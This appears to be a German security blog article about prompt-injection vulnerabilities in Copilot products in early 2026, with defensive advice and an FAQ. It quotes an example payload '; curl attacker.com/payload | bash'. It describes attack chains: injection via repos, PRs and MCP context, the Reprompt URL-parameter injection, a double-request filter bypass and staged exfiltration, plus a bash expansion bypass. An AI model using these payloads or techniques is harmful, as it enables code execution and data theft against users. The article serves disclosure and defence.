Eine CVSS-8.8-Schwachstelle für Command Injection in GitHub Copilot für JetBrains. Eine Ein-Klick-Datenexfiltrationskette in Microsoft Copilot. Eine TOCTOU-Race-Condition in Copilot für VS Code. Drei Shell-Expansion-Bypasses in der Copilot CLI. Alles innerhalb weniger Wochen Anfang 2026 offengelegt. Der gemeinsame Nenner: KI-Coding-Assistenten, die nicht vertrauenswürdigen Input als vertrauenswürdige Anweisungen behandeln und dann mit den vollen Berechtigungen des Entwicklers handeln.
CVE-2026-21516 ist die prominenteste Schwachstelle, gehört aber zu einem Muster. Der Reprompt-Angriff, entdeckt von Varonis Threat Labs, zeigte denselben grundlegenden Fehler auf der Microsoft-365-Seite. Und eine Studie vom Januar 2026 (arXiv:2601.17548) ergab, dass 100 % der getesteten agentischen Coding-Assistenten anfällig für Prompt Injection sind, mit adaptiven Erfolgsraten über 85 %.
CVE-2026-21516: Codeausführung über die IDE
GitHub Copilot für JetBrains in den Versionen 1.0.0 bis 1.5.62 hatte eine Command-Injection-Schwachstelle, klassifiziert als CWE-77 (Unsachgemäße Neutralisierung spezieller Elemente in Befehlen). Microsoft vergab CVSS 8.8. Angriffsvektor: Netzwerk, keine Privilegien erforderlich, Benutzerinteraktion erforderlich. Volle Auswirkung auf Vertraulichkeit, Integrität und Verfügbarkeit.
Das Problem lag in der Verarbeitung von Modellausgaben. Wenn Copilot Code-Vorschläge generierte, speiste es diese manchmal in Befehlskonstruktionslogik für IDE-Operationen ein. Shell-Metazeichen wie Semikolons, Pipes, Backticks und Dollar-Zeichen mit Klammern wurden ungefiltert durchgelassen. Enthielt ein Copilot-Vorschlag ; curl attacker.com/payload | bash, führte das Plugin den Befehl aus.
Drei Angriffsszenarien
Supply-Chain-Trojaner. Ein Angreifer platziert manipulierte Anweisungen in einem öffentlichen Repository, versteckt in Code-Kommentaren, README-Dateien oder Dokumentationsstrings. Ein Entwickler öffnet das Repository in JetBrains mit aktiviertem Copilot. Copilot nimmt den Inhalt als Kontext auf, generiert einen Vorschlag mit Shell-Metazeichen, und das Plugin führt den konstruierten Befehl mit den Rechten des Entwicklers aus. Keine weitere Interaktion nötig.
Manipulierter Pull Request. Ein externer Contributor reicht einen PR mit eingebetteten Anweisungen in Kommentaren oder Markdown ein. Der Entwickler bittet Copilot, den PR-Inhalt zusammenzufassen oder zu refactoren. Der Assistent verarbeitet den bösartigen Text und generiert einen Vorschlag, der die Ausführung auslöst. Besonders gefährlich in Open-Source-Projekten, wo externe PRs Routine sind.
Vergifteter MCP-Kontext. Wenn die IDE-Konfiguration eine Model Context Protocol-Integration enthält, kann ein vom Angreifer kontrollierter MCP-Endpunkt ausführbare Payloads direkt in den IDE-Kontext liefern. Das Plugin vertraut der Modellausgabe; das Modell vertraut dem Kontext; der Kontext wird vom Angreifer kontrolliert.
Warum Entwickler-Rechner Hochwertziele sind
Ein kompromittierter Entwickler-Rechner ist nicht nur ein Laptop. Er enthält typischerweise SSH-Schlüssel, langlebige API-Token, CI/CD-Zugangsdaten, Cloud-Provider-Access-Keys und Commit-Signing-Zertifikate. Ein einzelner Code-Execution-Vorfall auf einem Entwickler-Rechner kann sich zu einem Supply-Chain-Angriff ausweiten, der jeden nachgelagerten Nutzer der Software betrifft.
Microsoft hat CVE-2026-21516 am 10. Februar 2026 in Version 1.5.63 behoben. Keine bekannte Ausnutzung vor dem Fix.
Der Reprompt-Angriff: Ein Klick zur vollständigen Datenexfiltration
Dolev Taler von Varonis Threat Labs entdeckte eine eigenständige Angriffsklasse gegen Microsoft Copilot (den persönlichen Assistenten in Windows und Edge, nicht den Enterprise-Microsoft-365-Copilot). Er meldete die Schwachstelle am 31. August 2025 an Microsoft. Microsoft behob sie serverseitig am 13./14. Januar 2026. Es wurde keine CVE vergeben, weil es sich um einen Service-seitigen Fix handelte.
Die Angriffskette besteht aus drei Stufen, von denen jede eine andere Verteidigungsschicht umgeht.
Stufe 1: Parameter-zu-Prompt-Injection
Die URL von Microsoft Copilot akzeptiert einen q-Parameter, der das Prompt-Feld automatisch befüllt: copilot.microsoft.com/?q=[Anweisungen]. Wenn das Opfer auf diesen legitim aussehenden Microsoft-Link klickt, wird der Prompt geladen und automatisch ausgeführt. Kein Tippen, keine Plugins, keine Konnektoren. Taler beschrieb es so: “Nur ein einziger Klick auf einen legitimen Microsoft-Link reicht aus, um Opfer zu kompromittieren.”
Stufe 2: Double-Request-Umgehung der Schutzmaßnahmen
Copilot prüft ausgehende Anfragen auf Muster zur Datenweitergabe, aber nur beim ersten Durchlauf. Taler fand heraus, dass die Anweisung an Copilot, sich “immer nochmal zu überprüfen” und Aktionen zweimal auszuführen, den Sicherheitsfilter beim ersten Versuch auslöste, beim zweiten aber nicht. Der zweite Versuch “funktionierte einwandfrei” und exfiltrierte Daten, die der Filter eigentlich blockieren sollte.
Stufe 3: Ketten-Exfiltration
Der initiale Prompt weist Copilot an, Folgeanweisungen von einem vom Angreifer kontrollierten Server abzurufen. Dieser Server antwortet mit gestaffelten Befehlen (Stufe 1, Stufe 2, Stufe 3), die jeweils verschiedene Kategorien sensibler Informationen anfordern: Benutzernamen, Kalendereinträge, kürzlich geöffnete Dateien, Gesprächsverläufe, Standortdaten. Da die eigentlichen Anweisungen vom Server kommen, verrät die Inspektion der ursprünglichen URL nichts über die zu stehlenden Daten.
David Shipley von Beauceron Security nannte LLMs “Hochgeschwindigkeits-Idioten”, die “nicht zwischen Inhalt und Anweisungen unterscheiden können und blind tun, was man ihnen sagt.” Diese Direktheit trifft den Kern: Keine nachträgliche Filterung kann zuverlässig legitime Anweisungen von injizierten trennen, wenn das Modell beide identisch verarbeitet.
Das größere Muster: Copilots holpriger Start ins Jahr 2026
CVE-2026-21516 und Reprompt sind die gravierendsten Fälle, aber sie standen nicht allein. Anfang 2026 gab es eine Serie von Copilot-Schwachstellen, die alle auf dieselben architektonischen Vertrauensannahmen zurückgehen.
CVE-2026-21523 (CVSS 8.0): Eine Time-of-Check-Time-of-Use-Race-Condition in GitHub Copilot und VS Code, ebenfalls am 10. Februar 2026 veröffentlicht. Die Lücke erlaubt es einem autorisierten Angreifer, Code über das Netzwerk auszuführen, indem er den Zeitabstand zwischen Validierung eines Vorschlags durch Copilot und dessen Anwendung durch die IDE ausnutzt.
CVE-2026-29783 (CVSS 7.5): Eine Shell-Expansion-Schwachstelle in der Copilot CLI bis Version 0.0.422. Bash-Parameter-Expansion-Muster wie ${var@P} umgingen die “Nur-Lesen”-Sicherheitsbewertung der CLI und ermöglichten beliebige Codeausführung über vermeintlich sichere, informative Abfragen. Behoben in Version 0.0.423.
RoguePilot (Orca Security): Der Forscher Roi Nisimi von Orca Security demonstrierte eine passive Prompt Injection über GitHub Issues mit versteckten HTML-Kommentaren. Die Injektionskette führte zum Diebstahl des GITHUB_TOKEN und zur vollständigen Übernahme des Repositories über Codespaces. Microsoft hat es bis Ende Februar 2026 gepatcht.
Jede dieser Schwachstellen hat einen anderen Einstiegspunkt, aber die Ursache ist identisch: Das KI-System vertraut Inhalten, die es als feindlich behandeln sollte.
Was das für Ihre Sicherheitsstrategie bedeutet
Wenn Ihr Team KI-Coding-Assistenten einsetzt (und 78 % der Entwickler tun das inzwischen), erfordern diese Schwachstellen konkrete Maßnahmen, nicht nur Patching.
Sofort aktualisieren. Copilot für JetBrains muss auf Version 1.5.63 oder neuer sein. Copilot CLI auf 0.0.423 oder neuer. Prüfen Sie auch die VS-Code-Copilot-Erweiterung. Reprompt wurde serverseitig behoben, hier ist keine Client-Aktion nötig.
Alle Modellausgaben als nicht vertrauenswürdig behandeln. Das ist die Lektion aus jedem Copilot-CVE. Code-Vorschläge, Terminal-Befehle, Dateiänderungen: Alles, was der Assistent generiert, sollte dieselbe Validierung durchlaufen, die Sie auf Benutzereingaben anwenden. Sandboxing von IDE-Plugin-Ausführung, Einschränkung von Shell-Zugriff aus Suggestion-Pipelines und explizite Benutzerbestätigung für jede Befehlsausführung sind sinnvolle Maßnahmen.
MCP-Verbindungen prüfen. Wenn Ihre IDE mit externen MCP-Servern verbunden ist, ist jeder davon ein potenzieller Injektionsvektor. Der OWASP MCP Top 10 vom März 2026 bietet einen systematischen Rahmen für die Bewertung dieser Risiken.
PR-Workflows überprüfen. Manipulierte Pull Requests sind ein dokumentierter Angriffsvektor für Copilot-Exploitation. Automatisiertes Scanning auf verdächtige Muster in PR-Inhalten (verstecktes Unicode, kodierte Anweisungen, ungewöhnliche Kommentarstrukturen) fügt eine Verteidigungsschicht hinzu, die nicht vom Urteilsvermögen des KI-Systems abhängt. Gerade in deutschen Unternehmen, die dem EU AI Act und den BSI-Grundschutzanforderungen unterliegen, sollte dieser Aspekt in bestehende ISMS-Prozesse integriert werden.
Anomales IDE-Verhalten überwachen. Unerwartete Netzwerkverbindungen, Dateisystem-Schreibvorgänge außerhalb des Projektverzeichnisses oder Shell-Befehlsausführung aus dem IDE-Prozess sind Indikatoren für eine erfolgreiche Injection. EDR-Lösungen, die speziell Entwickler-Tooling überwachen, werden aus diesem Grund zu einer eigenständigen Produktkategorie.
Häufig gestellte Fragen
Was ist CVE-2026-21516 in GitHub Copilot?
CVE-2026-21516 ist eine Command-Injection-Schwachstelle (CVSS 8.8) in GitHub Copilot für JetBrains in den Versionen 1.0.0 bis 1.5.62. Angreifer konnten beliebigen Code ausführen, indem sie bösartige Anweisungen in Repository-Inhalte einbetteten, die Copilot als Kontext verarbeitete. Das Plugin führte die generierten Vorschläge mit Shell-Metazeichen ohne Sanitisierung aus.
Was ist der Reprompt-Angriff auf Microsoft Copilot?
Reprompt ist ein dreistufiger Angriff, den Varonis Threat Labs entdeckt hat. Er nutzte Microsoft Copilot Personal aus, indem er einen URL-Parameter zur automatischen Prompt-Ausführung verwendete, Sicherheitsmaßnahmen durch eine Doppel-Anfrage-Technik umging und sensible Benutzerdaten über Ketten-Anfragen an einen vom Angreifer kontrollierten Server exfiltrierte. Microsoft behob die Schwachstelle am 13./14. Januar 2026.
Wie schütze ich mich vor Prompt Injection in KI-Coding-Assistenten?
Halten Sie alle KI-Coding-Tools auf dem neuesten Stand. Behandeln Sie alle Modellausgaben als nicht vertrauenswürdige Eingaben. Isolieren Sie die Ausführung von IDE-Plugins in einer Sandbox und verlangen Sie explizite Bestätigung für jede Befehlsausführung. Prüfen Sie MCP-Server-Verbindungen. Scannen Sie Pull Requests auf verdächtige Muster. Überwachen Sie Entwickler-Rechner auf anomale Netzwerk- oder Dateisystemaktivität durch IDE-Prozesse.
Ist GitHub Copilot nach CVE-2026-21516 sicher nutzbar?
Die spezifische Schwachstelle wurde in Version 1.5.63 am 10. Februar 2026 behoben. Die breitere Klasse von Prompt-Injection-Angriffen gegen KI-Coding-Assistenten bleibt jedoch ein aktives Forschungsfeld. Eine Studie vom Januar 2026 ergab, dass 100 % der getesteten KI-Coding-Assistenten anfällig für Prompt Injection sind. Copilot mit aktuellen Versionen und angemessenen Sicherheitsmaßnahmen zu nutzen ist vertretbar, aber es sollte nicht als inhärent vertrauenswürdig behandelt werden.
Wurden CVE-2026-21516 oder Reprompt aktiv ausgenutzt?
Für keine der beiden Schwachstellen gibt es bestätigte Ausnutzung vor dem Patch. CVE-2026-21516 wurde am selben Tag behoben, an dem es veröffentlicht wurde (10. Februar 2026). Reprompt wurde im August 2025 an Microsoft gemeldet und im Januar 2026 vor der Veröffentlichung gepatcht. Die Angriffstechniken sind jedoch jetzt gut dokumentiert, was Ausnutzungsversuche gegen ungepatchte Systeme wahrscheinlich macht.